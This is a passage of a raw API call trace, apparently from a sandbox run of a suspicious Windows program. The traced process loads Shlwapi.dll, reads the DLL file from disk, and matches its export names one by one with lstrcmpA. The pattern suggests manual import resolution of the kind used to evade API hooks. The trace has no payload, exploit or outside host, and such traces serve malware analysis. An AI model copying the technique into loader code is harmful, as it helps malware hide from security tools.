lpString2="DsAddressToSiteNamesW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0278.221] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0278.222] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0278.223] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0278.224] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0278.230] GetProcessHeap () returned 0x470000 [0278.230] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x470000) returned 1 [0278.230] GetProcessHeap () returned 0x470000 [0278.230] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489160 [0278.230] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0278.231] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0278.231] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0278.232] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0278.232] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0278.232] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0278.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0278.233] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0278.233] GetProcessHeap () returned 0x470000 [0278.233] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x51148) returned 0x2d05030 [0278.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0278.233] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0278.338] CloseHandle (hObject=0x17c) returned 1 [0278.338] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0278.338] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0278.338] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0278.338] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0278.338] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0278.339] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0278.339] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0278.339] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0278.339] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0278.340] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0278.340] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0278.340] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0278.340] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0278.340] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0278.340] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0278.341] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0278.341] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0278.341] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0278.341] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0278.342] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0278.342] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0278.343] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0278.343] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0278.343] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0278.343] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0278.343] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0278.344] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0278.344] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0278.345] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0278.345] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0278.345] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0278.345] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0278.346] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0278.346] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0278.347] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0278.347] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") 